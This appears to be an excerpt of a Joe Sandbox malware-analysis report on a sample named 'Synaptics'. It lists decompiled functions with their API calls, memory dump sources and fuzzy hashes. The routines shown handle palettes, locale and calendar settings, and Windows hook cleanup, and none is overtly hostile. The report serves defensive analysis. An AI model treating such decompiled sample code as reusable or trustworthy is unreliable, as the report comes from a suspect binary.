                                                                                                                                                                                                                            • Instruction ID: f3059b0da6ec3e1b640db76434b3b8e2fe7969af481d0775728bf7a32dd752b6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2597941c910caa3ba4572272bd3ca43fbff399438b71026350468ce82a15d9f1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A521C3706001049FD760EF31CD91ADAB7F8EF45304F5184FAA94CA7352DAB8AE418B98
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042A288 Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 78%
                                                                                                                                                                                                                            			E0042A288(struct HPALETTE__* __eax) {
				struct HPALETTE__* _t21;
				char _t28;
				signed int _t30;
				struct HPALETTE__* _t36;
				struct HPALETTE__* _t37;
				struct HDC__* _t38;
				intOrPtr _t39;

				_t21 = __eax;
				_t36 = __eax;
				_t39 =  *((intOrPtr*)(__eax + 0x28));
				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t39 + 0x10) == 0 &&  *((intOrPtr*)(_t39 + 0x14)) != 0) {
					_t22 =  *((intOrPtr*)(_t39 + 0x14));
					if( *((intOrPtr*)(_t39 + 0x14)) ==  *((intOrPtr*)(_t39 + 8))) {
						E00428BFC(_t22);
					}
					_t21 = E00426750( *((intOrPtr*)(_t39 + 0x14)), 1 <<  *(_t39 + 0x3e));
					_t37 = _t21;
					 *(_t39 + 0x10) = _t37;
					if(_t37 == 0) {
						_push(0);
						L00407638();
						_t21 = E00426060(_t21);
						_t38 = _t21;
						if( *((char*)(_t39 + 0x71)) != 0) {
							L9:
							_t28 = 1;
						} else {
							_push(0xc);
							_push(_t38);
							L00407380();
							_push(0xe);
							_push(_t38);
							L00407380();
							_t30 = _t21 * _t21;
							_t21 = ( *(_t39 + 0x2a) & 0x0000ffff) * ( *(_t39 + 0x28) & 0x0000ffff);
							if(_t30 < _t21) {
								goto L9;
							} else {
								_t28 = 0;
							}
						}
						 *((char*)(_t39 + 0x71)) = _t28;
						if(_t28 != 0) {
							_t21 = CreateHalftonePalette(_t38);
							 *(_t39 + 0x10) = _t21;
						}
						_push(_t38);
						_push(0);
						L00407888();
						if( *(_t39 + 0x10) == 0) {
							 *((char*)(_t36 + 0x30)) = 1;
							return _t21;
						}
					}
				}
				return _t21;
			}










                                                                                                                                                                                                                            0x0042a288
                                                                                                                                                                                                                            0x0042a28c
                                                                                                                                                                                                                            0x0042a28e
                                                                                                                                                                                                                            0x0042a295
                                                                                                                                                                                                                            0x0042a2af
                                                                                                                                                                                                                            0x0042a2b5
                                                                                                                                                                                                                            0x0042a2b7
                                                                                                                                                                                                                            0x0042a2b7
                                                                                                                                                                                                                            0x0042a2ce
                                                                                                                                                                                                                            0x0042a2d3
                                                                                                                                                                                                                            0x0042a2d5
                                                                                                                                                                                                                            0x0042a2da
                                                                                                                                                                                                                            0x0042a2dc
                                                                                                                                                                                                                            0x0042a2de
                                                                                                                                                                                                                            0x0042a2e3
                                                                                                                                                                                                                            0x0042a2e8
                                                                                                                                                                                                                            0x0042a2ee
                                                                                                                                                                                                                            0x0042a317
                                                                                                                                                                                                                            0x0042a317
                                                                                                                                                                                                                            0x0042a2f0
                                                                                                                                                                                                                            0x0042a2f0
                                                                                                                                                                                                                            0x0042a2f2
                                                                                                                                                                                                                            0x0042a2f3
                                                                                                                                                                                                                            0x0042a2fa
                                                                                                                                                                                                                            0x0042a2fc
                                                                                                                                                                                                                            0x0042a2fd
                                                                                                                                                                                                                            0x0042a302
                                                                                                                                                                                                                            0x0042a30d
                                                                                                                                                                                                                            0x0042a311
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042a313
                                                                                                                                                                                                                            0x0042a313
                                                                                                                                                                                                                            0x0042a313
                                                                                                                                                                                                                            0x0042a311
                                                                                                                                                                                                                            0x0042a319
                                                                                                                                                                                                                            0x0042a31e
                                                                                                                                                                                                                            0x0042a321
                                                                                                                                                                                                                            0x0042a326
                                                                                                                                                                                                                            0x0042a326
                                                                                                                                                                                                                            0x0042a329
                                                                                                                                                                                                                            0x0042a32a
                                                                                                                                                                                                                            0x0042a32c
                                                                                                                                                                                                                            0x0042a335
                                                                                                                                                                                                                            0x0042a337
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042a337
                                                                                                                                                                                                                            0x0042a335
                                                                                                                                                                                                                            0x0042a2da
                                                                                                                                                                                                                            0x0042a33f

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2DE
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2F3
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2FD
                                                                                                                                                                                                                            • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A321
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A32C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B380CreateHalftonePalette
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 178651289-0
                                                                                                                                                                                                                            • Opcode ID: c8d4c93cc583ed9d9441793febc9cc7f1891d12bd8e01e95aafc8bbdf1e36651
                                                                                                                                                                                                                            • Instruction ID: a69a9921d942d4c2fc4b887ba219ee821ce262c4093934c48757552ca675d17f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8d4c93cc583ed9d9441793febc9cc7f1891d12bd8e01e95aafc8bbdf1e36651
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E211B4217092699BEB20EF25A4457EF3690AB10359F84012AFD0097281D7BC9CA5C3EA
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004266B8 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 40%
                                                                                                                                                                                                                            			E004266B8(intOrPtr __eax) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff8;
				_v5 = 0;
				if( *0x49e894 == 0) {
					return _v5;
				} else {
					_push(0);
					L00407638();
					_v12 = __eax;
					_push(_t32);
					_push(0x42673e);
					_push( *[fs:edx]);
					 *[fs:edx] = _t35;
					_push(0x68);
					_t14 = _v12;
					_push(_t14);
					L00407380();
					if(_t14 >= 0x10) {
						_push(__eax + 4);
						_push(8);
						_push(0);
						_t18 =  *0x49e894; // 0x100805eb
						_push(_t18);
						L004073A8();
						_push(__eax + ( *(__eax + 2) & 0x0000ffff) * 4 - 0x1c);
						_push(8);
						_push(8);
						_t21 =  *0x49e894; // 0x100805eb
						_push(_t21);
						L004073A8();
						_v5 = 1;
					}
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(0x426745);
					_t16 = _v12;
					_push(_t16);
					_push(0);
					L00407888();
					return _t16;
				}
			}













                                                                                                                                                                                                                            0x004266b9
                                                                                                                                                                                                                            0x004266bb
                                                                                                                                                                                                                            0x004266c1
                                                                                                                                                                                                                            0x004266cc
                                                                                                                                                                                                                            0x0042674c
                                                                                                                                                                                                                            0x004266ce
                                                                                                                                                                                                                            0x004266ce
                                                                                                                                                                                                                            0x004266d0
                                                                                                                                                                                                                            0x004266d5
                                                                                                                                                                                                                            0x004266da
                                                                                                                                                                                                                            0x004266db
                                                                                                                                                                                                                            0x004266e0
                                                                                                                                                                                                                            0x004266e3
                                                                                                                                                                                                                            0x004266e6
                                                                                                                                                                                                                            0x004266e8
                                                                                                                                                                                                                            0x004266eb
                                                                                                                                                                                                                            0x004266ec
                                                                                                                                                                                                                            0x004266f4
                                                                                                                                                                                                                            0x004266f9
                                                                                                                                                                                                                            0x004266fa
                                                                                                                                                                                                                            0x004266fc
                                                                                                                                                                                                                            0x004266fe
                                                                                                                                                                                                                            0x00426703
                                                                                                                                                                                                                            0x00426704
                                                                                                                                                                                                                            0x00426711
                                                                                                                                                                                                                            0x00426712
                                                                                                                                                                                                                            0x00426714
                                                                                                                                                                                                                            0x00426716
                                                                                                                                                                                                                            0x0042671b
                                                                                                                                                                                                                            0x0042671c
                                                                                                                                                                                                                            0x00426721
                                                                                                                                                                                                                            0x00426721
                                                                                                                                                                                                                            0x00426727
                                                                                                                                                                                                                            0x0042672a
                                                                                                                                                                                                                            0x0042672d
                                                                                                                                                                                                                            0x00426732
                                                                                                                                                                                                                            0x00426735
                                                                                                                                                                                                                            0x00426736
                                                                                                                                                                                                                            0x00426738
                                                                                                                                                                                                                            0x0042673d
                                                                                                                                                                                                                            0x0042673d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 004266D0
                                                                                                                                                                                                                            • 73C9AD70.GDI32(?,00000068,00000000,0042673E,?,00000000), ref: 004266EC
                                                                                                                                                                                                                            • 73C9AEA0.GDI32(100805EB,00000000,00000008,?,?,00000068,00000000,0042673E,?,00000000), ref: 00426704
                                                                                                                                                                                                                            • 73C9AEA0.GDI32(100805EB,00000008,00000008,?,100805EB,00000000,00000008,?,?,00000068,00000000,0042673E,?,00000000), ref: 0042671C
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,?,00426745,0042673E,?,00000000), ref: 00426738
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B380
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 120756276-0
                                                                                                                                                                                                                            • Opcode ID: 26d92e3796d48fbf02547cc90baff66c5ce55989e6466209eef713e3b3d2153e
                                                                                                                                                                                                                            • Instruction ID: c0b5c4fbf9d89d63b7e1562d2f304591e56de7434d42fe68f424cbdc017dfa0b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 26d92e3796d48fbf02547cc90baff66c5ce55989e6466209eef713e3b3d2153e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B11A531A483047EFB41DBE5AC86F6D7BA8E745718F94806BFA04AA1C1D97A6404C729
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040CBEC Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                                                                                            			E0040CBEC(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x40cc83);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E0040C964(GetThreadLocale(), 0x40cc98, 0x100b,  &_v8);
				_t29 = E00409664(0x40cc98, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E0040CB38, GetThreadLocale(), _t29, "true");
					_t27 = 7;
					_t18 = 0x49e770;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E0040CB74, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0040CC8A);
				return E004049C0( &_v8);
			}










                                                                                                                                                                                                                            0x0040cbec
                                                                                                                                                                                                                            0x0040cbef
                                                                                                                                                                                                                            0x0040cbf4
                                                                                                                                                                                                                            0x0040cbf5
                                                                                                                                                                                                                            0x0040cbfa
                                                                                                                                                                                                                            0x0040cbfd
                                                                                                                                                                                                                            0x0040cc13
                                                                                                                                                                                                                            0x0040cc25
                                                                                                                                                                                                                            0x0040cc2f
                                                                                                                                                                                                                            0x0040cc3f
                                                                                                                                                                                                                            0x0040cc44
                                                                                                                                                                                                                            0x0040cc49
                                                                                                                                                                                                                            0x0040cc4e
                                                                                                                                                                                                                            0x0040cc4e
                                                                                                                                                                                                                            0x0040cc54
                                                                                                                                                                                                                            0x0040cc57
                                                                                                                                                                                                                            0x0040cc57
                                                                                                                                                                                                                            0x0040cc68
                                                                                                                                                                                                                            0x0040cc68
                                                                                                                                                                                                                            0x0040cc6f
                                                                                                                                                                                                                            0x0040cc72
                                                                                                                                                                                                                            0x0040cc75
                                                                                                                                                                                                                            0x0040cc82

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(?,00000000,0040CC83,?,?,00000000), ref: 0040CC04
                                                                                                                                                                                                                              • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,?,00000000,0040CC83,?,?,00000000), ref: 0040CC34
                                                                                                                                                                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000CB38,00000000,00000000,?), ref: 0040CC3F
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040CC83,?,?,00000000), ref: 0040CC5D
                                                                                                                                                                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000CB74,00000000,00000000,00000003), ref: 0040CC68
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4102113445-0
                                                                                                                                                                                                                            • Opcode ID: 8248b440ae0a9565a755423cbf294169d4993abaad373ce74e76ef033f4fb80c
                                                                                                                                                                                                                            • Instruction ID: 1afeb0ae3c984d7c4f1a7fc68b04595db4598325ea28b3ac7f3617db3f710194
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8248b440ae0a9565a755423cbf294169d4993abaad373ce74e76ef033f4fb80c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70014270608204EBF701A7B5DD43F5E725CDB46B18F610737B900BA2C0D63CAE00826D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00458FB8 Relevance: 7.5, APIs: 5, Instructions: 25synchronizationthreadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00458FB8() {
				void* _t2;
				void* _t5;
				void* _t8;
				struct HHOOK__* _t10;

				if( *0x49ebd0 != 0) {
					_t10 =  *0x49ebd0; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0x49ebd0 = 0;
				if( *0x49ebd4 != 0) {
					_t2 =  *0x49ebcc; // 0x0
					SetEvent(_t2);
					if(GetCurrentThreadId() !=  *0x49ebc8) {
						_t8 =  *0x49ebd4; // 0x0
						WaitForSingleObject(_t8, 0xffffffff);
					}
					_t5 =  *0x49ebd4; // 0x0
					CloseHandle(_t5);
					 *0x49ebd4 = 0;
					return 0;
				}
				return 0;
			}







                                                                                                                                                                                                                            0x00458fbf
                                                                                                                                                                                                                            0x00458fc1
                                                                                                                                                                                                                            0x00458fc7
                                                                                                                                                                                                                            0x00458fc7
                                                                                                                                                                                                                            0x00458fce
                                                                                                                                                                                                                            0x00458fda
                                                                                                                                                                                                                            0x00458fdc
                                                                                                                                                                                                                            0x00458fe2
                                                                                                                                                                                                                            0x00458ff2
                                                                                                                                                                                                                            0x00458ff6
                                                                                                                                                                                                                            0x00458ffc
                                                                                                                                                                                                                            0x00458ffc
                                                                                                                                                                                                                            0x00459001
                                                                                                                                                                                                                            0x00459007
                                                                                                                                                                                                                            0x0045900e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045900e
                                                                                                                                                                                                                            0x00459013

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • UnhookWindowsHookEx.USER32(00000000), ref: 00458FC7
                                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00458FE2
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00458FE7
                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00458FFC
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00459007
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2429646606-0
                                                                                                                                                                                                                            • Opcode ID: a01ab741e0556a9c02a6a949833d3b1770402395474016c92faede3881800cad
                                                                                                                                                                                                                            • Instruction ID: 3bc59d0302d60dcdb639d85b4c22765180d6681b902288d708a5b48c4f0846c4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a01ab741e0556a9c02a6a949833d3b1770402395474016c92faede3881800cad
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9CF0ACB1905100EAC750EBBBED49A063395A724315F000A3BB112D71E1D73CF884CB1E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040CC9C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                            			E0040CC9C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x40ce66);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E004049C0(__edx);
				E0040C964(GetThreadLocale(), 0x40ce7c, 0x1009,  &_v12);
				if(E00409664(0x40ce7c, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00404C80(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x49b134], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E0040A0C8(_t124 + _t92 - 1, 2, 0x40ce80);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E0040A0C8(_t124 + _t92 - 1, 4, 0x40ce90);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E0040A0C8(_t124 + _t92 - 1, 2, 0x40cea8);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00404C88(_t122, 0x40cec0);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404BA8();
												E00404C88(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E00404C88(_t122, 0x40ceb4);
										_t92 = _t92 + 1;
									}
								} else {
									E00404C88(_t122, 0x40cea0);
									_t92 = _t92 + 3;
								}
							} else {
								E00404C88(_t122, 0x40ce8c);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040DD78(_t124, _t92);
							E00404EE0(_t124, _v8, _t92,  &_v20);
							E00404C88(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x49e748; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00404A14(_t122, _t124);
					} else {
						while(_t92 <= E00404C80(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404BA8();
									E00404C88(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0040CE6D);
				return E004049E4( &_v24, 4);
			}























                                                                                                                                                                                                                            0x0040cc9c
                                                                                                                                                                                                                            0x0040cca1
                                                                                                                                                                                                                            0x0040cca2
                                                                                                                                                                                                                            0x0040cca3
                                                                                                                                                                                                                            0x0040cca4
                                                                                                                                                                                                                            0x0040cca5
                                                                                                                                                                                                                            0x0040cca9
                                                                                                                                                                                                                            0x0040ccab
                                                                                                                                                                                                                            0x0040ccaf
                                                                                                                                                                                                                            0x0040ccb0
                                                                                                                                                                                                                            0x0040ccb5
                                                                                                                                                                                                                            0x0040ccb8
                                                                                                                                                                                                                            0x0040ccbb
                                                                                                                                                                                                                            0x0040ccc2
                                                                                                                                                                                                                            0x0040ccda
                                                                                                                                                                                                                            0x0040ccf2
                                                                                                                                                                                                                            0x0040ce3c
                                                                                                                                                                                                                            0x0040ce3e
                                                                                                                                                                                                                            0x0040ce43
                                                                                                                                                                                                                            0x0040ce45
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040cd5b
                                                                                                                                                                                                                            0x0040cd60
                                                                                                                                                                                                                            0x0040cd67
                                                                                                                                                                                                                            0x0040cda5
                                                                                                                                                                                                                            0x0040cdaa
                                                                                                                                                                                                                            0x0040cdac
                                                                                                                                                                                                                            0x0040cdcb
                                                                                                                                                                                                                            0x0040cdd0
                                                                                                                                                                                                                            0x0040cdd2
                                                                                                                                                                                                                            0x0040cdf3
                                                                                                                                                                                                                            0x0040cdf8
                                                                                                                                                                                                                            0x0040cdfa
                                                                                                                                                                                                                            0x0040ce0f
                                                                                                                                                                                                                            0x0040ce0f
                                                                                                                                                                                                                            0x0040ce11
                                                                                                                                                                                                                            0x0040ce17
                                                                                                                                                                                                                            0x0040ce1e
                                                                                                                                                                                                                            0x0040ce13
                                                                                                                                                                                                                            0x0040ce13
                                                                                                                                                                                                                            0x0040ce15
                                                                                                                                                                                                                            0x0040ce2c
                                                                                                                                                                                                                            0x0040ce36
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040ce15
                                                                                                                                                                                                                            0x0040cdfc
                                                                                                                                                                                                                            0x0040ce03
                                                                                                                                                                                                                            0x0040ce08
                                                                                                                                                                                                                            0x0040ce08
                                                                                                                                                                                                                            0x0040cdd4
                                                                                                                                                                                                                            0x0040cddb
                                                                                                                                                                                                                            0x0040cde0
                                                                                                                                                                                                                            0x0040cde0
                                                                                                                                                                                                                            0x0040cdae
                                                                                                                                                                                                                            0x0040cdb5
                                                                                                                                                                                                                            0x0040cdba
                                                                                                                                                                                                                            0x0040cdba
                                                                                                                                                                                                                            0x0040ce3b
                                                                                                                                                                                                                            0x0040ce3b
                                                                                                                                                                                                                            0x0040cd69
                                                                                                                                                                                                                            0x0040cd72
                                                                                                                                                                                                                            0x0040cd80
                                                                                                                                                                                                                            0x0040cd8a
                                                                                                                                                                                                                            0x0040cd8f
                                                                                                                                                                                                                            0x0040cd8f
                                                                                                                                                                                                                            0x0040cd67
                                                                                                                                                                                                                            0x0040ccf8
                                                                                                                                                                                                                            0x0040ccf8
                                                                                                                                                                                                                            0x0040ccfd
                                                                                                                                                                                                                            0x0040cd00
                                                                                                                                                                                                                            0x0040cd0e
                                                                                                                                                                                                                            0x0040cd0a
                                                                                                                                                                                                                            0x0040cd0a
                                                                                                                                                                                                                            0x0040cd0a
                                                                                                                                                                                                                            0x0040cd12
                                                                                                                                                                                                                            0x0040cd4d
                                                                                                                                                                                                                            0x0040cd14
                                                                                                                                                                                                                            0x0040cd39
                                                                                                                                                                                                                            0x0040cd1a
                                                                                                                                                                                                                            0x0040cd1a
                                                                                                                                                                                                                            0x0040cd1c
                                                                                                                                                                                                                            0x0040cd1e
                                                                                                                                                                                                                            0x0040cd20
                                                                                                                                                                                                                            0x0040cd29
                                                                                                                                                                                                                            0x0040cd33
                                                                                                                                                                                                                            0x0040cd33
                                                                                                                                                                                                                            0x0040cd20
                                                                                                                                                                                                                            0x0040cd38
                                                                                                                                                                                                                            0x0040cd38
                                                                                                                                                                                                                            0x0040cd38
                                                                                                                                                                                                                            0x0040cd44
                                                                                                                                                                                                                            0x0040cd12
                                                                                                                                                                                                                            0x0040ce4b
                                                                                                                                                                                                                            0x0040ce4d
                                                                                                                                                                                                                            0x0040ce50
                                                                                                                                                                                                                            0x0040ce53
                                                                                                                                                                                                                            0x0040ce65

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(?,00000000,0040CE66,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040CCCB
                                                                                                                                                                                                                              • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
